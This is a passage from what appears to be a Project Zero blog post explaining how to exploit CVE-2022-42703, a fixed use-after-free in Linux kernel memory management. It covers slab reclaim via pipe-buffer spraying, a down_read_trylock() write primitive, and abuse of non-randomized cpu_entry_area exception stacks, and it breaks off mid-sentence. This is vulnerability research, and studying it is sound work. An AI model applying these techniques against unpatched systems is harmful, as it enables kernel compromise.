Seth Jenkins, Project Zero
This blog post details an exploit for CVE-2022-42703 (P0 issue 2351 – Fixed 5 September 2022), a bug Jann Horn found in the Linux kernel’s memory management (MM) subsystem that leads to a use-after-free on struct anon_vma. As the bug is very complex (I certainly struggle to understand it!), a future blog post will describe the bug in full. For the time being, the issue tracker entry, this LWN article explaining what an anon_vma is and the commit that introduced the bug are great resources in order to gain additional context.
Setting the scene
Successfully triggering the underlying vulnerability causes folio->mapping to point to a freed anon_vma object. Calling madvise(…, MADV_PAGEOUT)can then be used to repeatedly trigger accesses to the freed anon_vma in folio_lock_anon_vma_read():
struct anon_vma *folio_lock_anon_vma_read(struct folio *folio,
struct rmap_walk_control *rwc)
{
struct anon_vma *anon_vma = NULL;
struct anon_vma *root_anon_vma;
unsigned long anon_mapping;
rcu_read_lock();
anon_mapping = (unsigned long)READ_ONCE(folio->mapping);
if ((anon_mapping & PAGE_MAPPING_FLAGS) != PAGE_MAPPING_ANON)
goto out;
if (!folio_mapped(folio))
goto out;
// anon_vma is dangling pointer
anon_vma = (struct anon_vma *) (anon_mapping – PAGE_MAPPING_ANON);
// root_anon_vma is read from dangling pointer
root_anon_vma = READ_ONCE(anon_vma->root);
if (down_read_trylock(&root_anon_vma->rwsem)) {
[…]
if (!folio_mapped(folio)) { // false
[…]
}
goto out;
}
if (rwc && rwc->try_lock) { // true
anon_vma = NULL;
rwc->contended = true;
goto out;
}
[…]
out:
rcu_read_unlock();
return anon_vma; // return dangling pointer
}
One potential exploit technique is to let the function return the dangling anon_vma pointer and try to make the subsequent operations do something useful. Instead, we chose to use the down_read_trylock() call within the function to corrupt memory at a chosen address, which we can do if we can control the root_anon_vma pointer that is read from the freed anon_vma.
Controlling the root_anon_vma pointer means reclaiming the freed anon_vma with attacker-controlled memory. struct anon_vma structures are allocated from their own kmalloc cache, which means we cannot simply free one and reclaim it with a different object. Instead we cause the associated anon_vma slab page to be returned back to the kernel page allocator by following a very similar strategy to the one documented here. By freeing all the anon_vma objects on a slab page, then flushing the percpu slab page partial freelist, we can cause the virtual memory previously associated with the anon_vma to be returned back to the page allocator. We then spray pipe buffers in order to reclaim the freed anon_vma with attacker controlled memory.
At this point, we’ve discussed how to turn our use-after-free into a down_read_trylock() call on an attacker-controlled pointer. The implementation of down_read_trylock() is as follows:
struct rw_semaphore {
atomic_long_t count;
atomic_long_t owner;
struct optimistic_spin_queue osq; /* spinner MCS lock */
raw_spinlock_t wait_lock;
struct list_head wait_list;
};
…
static inline int __down_read_trylock(struct rw_semaphore *sem)
{
long tmp;
DEBUG_RWSEMS_WARN_ON(sem->magic != sem, sem);
tmp = atomic_long_read(&sem->count);
while (!(tmp & RWSEM_READ_FAILED_MASK)) {
if (atomic_long_try_cmpxchg_acquire(&sem->count, &tmp,
tmp + RWSEM_READER_BIAS)) {
rwsem_set_reader_owned(sem);
return 1;
}
}
return 0;
}
It was helpful to emulate the down_read_trylock() in unicorn to determine how it behaves when given different sem->count values. Assuming this code is operating on inert and unchanging memory, it will increment sem->count by 0x100 if the 3 least significant bits and the most significant bit are all unset. That means it is difficult to modify a kernel pointer and we cannot modify any non 8-byte aligned values (as they’ll have one or more of the bottom three bits set). Additionally, this semaphore is later unlocked, causing whatever write we perform to be reverted in the imminent future. Furthermore, at this point we don’t have an established strategy for determining the KASLR slide nor figuring out the addresses of any objects we might want to overwrite with our newfound primitive. It turns out that regardless of any randomization the kernel presently has in place, there’s a straightforward strategy for exploiting this bug even given such a constrained arbitrary write.
Stack corruption…
On x86-64 Linux, when the CPU performs certain interrupts and exceptions, it will swap to a respective stack that is mapped to a static and non-randomized virtual address, with a different stack for the different exception types. A brief documentation of those stacks and their parent structure, the cpu_entry_area, can be found here. These stacks are most often used on entry into the kernel from userland, but they’re used for exceptions that happen in kernel mode as well. We’ve recently seen KCTF entries where attackers take advantage of the non-randomized cpu_entry_area stacks in order to access data at a known virtual address in kernel accessible memory even in the presence of SMAP and KASLR. You could also use these stacks to forge attacker-controlled data at a known kernel virtual address. This works because the attacker task’s general purpose register contents are pushed directly onto this stack when the switch from userland to kernel mode occurs due to one of these exceptions. This also occurs when the kernel itself generates an Interrupt Stack Table exception and swaps to an exception stack – except in that case, kernel GPR’s are pushed instead. These pushed registers are later used to restore kernel state once the exception is handled. In the case of a userland triggered exception, register contents are restored from the task stack.
One example of an IST exception is a DB exception which can be triggered by an attacker via a hardware breakpoint, the associated registers of which are described here. Hardware breakpoints can be triggered by a variety of different memory access types, namely reads, writes, and instruction fetches. These hardware breakpoints can be set using ptrace(2), and are preserved during kernel mode execution in a task contex